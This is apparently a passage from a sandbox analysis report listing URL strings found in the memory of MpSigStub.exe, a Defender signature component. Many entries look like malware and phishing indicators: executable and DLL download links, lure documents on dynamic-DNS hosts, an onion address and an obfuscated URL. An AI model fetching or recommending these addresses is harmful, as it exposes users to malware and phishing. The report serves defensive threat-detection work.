Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/home.html
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://mysibrand.info/e.js
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://mysibrand.info/s.js
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://n7pv51t.sed.odtllc.net
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://nameservicehosting3.in//load.php?spl=javad
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://nathannewman.org/wp-content/themes/boldnews/includes/js/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://navigation.iwatchavi.com/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://ncccnnnc.cn/img/index.php
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/final.php3
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/wait.php3
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://networksecurityx.hopto.org
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://nevergreen.net/456
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://new.beahh.com/startup.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/e.js
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/f2/f.js
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/s.js
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://nfinx.info
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://nh4esf33e.from-ia.com/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/download.php?filename=%s&key=%s
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/post.php
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://nownowsales.com/wp-admin/ulpbz/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://ns1.natalnosso.info:8082/windows.pac
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://ns33617.ovh.net/~clubregi/cartaoht.exe
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://nutricaoedesenvolvimento.com.br/i/i.sct
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://o%66%66%49%63e%2e%46%41q%53%65%72v.%43%6f%4d/%46%41%51%2e%6a%73
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://office-archive-input.com/scan.wbk?raw=true
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/project.rtf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/update.doc
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ogirikidanielifeanyi.com/wp-content/upgrade/neworder.html
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://old.forwart.ru/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://onecs-live.azureedge.net
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://onedrivenet.xyz/work/30.vbs
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://oneprivatecloudshareandfileprotectagenci.duckdns.org/receipt/invoice_651253.doc
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://online-docu-sign-st.com/yytr.png
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://online-security-center.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://online-stats201.info/ur.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://online.pdf.com.tropicaldesign.com.br/)
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://online2you.org/search.php?sid=1
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://onlinesecuritynet.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://oo.shmtb.info:888/phone.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://openym.info/pdf/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://opercomex.co/wp/wp-includes/images/wlw/don.html)
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://orcult.0lx.net/tcgeneration.htmg
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://pantscow.ru:8080/vector_graphic.js
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://passagensvhc.online/66.rtf
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 00000026.00000003.18296654379.00000138BE355000.00000004.00000001.sdmp	String found in binary or memory: http://pcmaticplus.com/success.html
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://perfectequipments.com/bm1/.tmp/.1.jstype=text/javascript
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://persefoni-rooms-toroni.gr/pdf/uzie/actions.php%22%20method%3d%22post
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://philippelaurent.org/rechnung/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://phimshock-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://pic.sogou.com/pics?query=%s
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://picosoftnepal.net/ach-form/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://pilasto.host/po.exe
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://ping.180solutions.com
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://pingakshotechnologies.com/vicaaralife/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://pirsl.com.au/signatures/new.jpg
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://plaintexw.com/xx.dll
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://planilha.webcindario.com/planilha
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://play.videosongplayer.com/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://playboy.com/search?SearchString=
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://playsong.mediasongplayer.com/
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-install.info/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.info/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://plugin.videosraros.info/chrome.xml
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://pluginprovider.com/?rap
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://pmevents.co.in/nd/index.php)
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://pmxmrnull.dynu.net:
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://pnronline.in/hiu.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://polifile.co/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://popall.com/lin/bbs.htm?code=talking&mode=1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://portalconnectme.com/56778786598.doc
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://portoseguropromissao.com.br/wp-content/uploads/revslider/templates/80s/z/z/z/po.zip.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://post.medusaranch.com/abonento9.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://premiumclass.bar/0pzional1a.dll
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://premiumclass.cyou/0pzional1a.dll
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://pricklypear.com/adobgran.php
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://private0091111.duckdns.org/qagj/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://psget.net/GetPsGet.ps1x
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://psynergi.dk/data
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ptnetproject.info/yrniii/yrniii/yrniii/yrniii/index.php
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://pub03832.duckdns.org/rwab/image.png
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pubs.vmware.com
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://pulp99.com/1.rtf
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://purelyrighteous.com/redirect/amvubmlmzxiubw9uy3jpzwzmqde4mjuuy29t
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://pusat-hacing.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://qiiqur.com/frix.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://quantsa.ru/?de
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://qudaih.com/pzlnkda/nbsa
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://queendrinks.com.ar/open-past-due-orders/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/ie/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/x
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://r.funmoods.com//
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://raa.qwepoii.org/v4/gtg/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://raggina.space/bc855646d052/spool/boot/acxbbz.dot
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://rbmllp.com/member.php
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://readlenta.ru/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://rebrand.ly/ohxnqak
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://recoverpcerror.com/
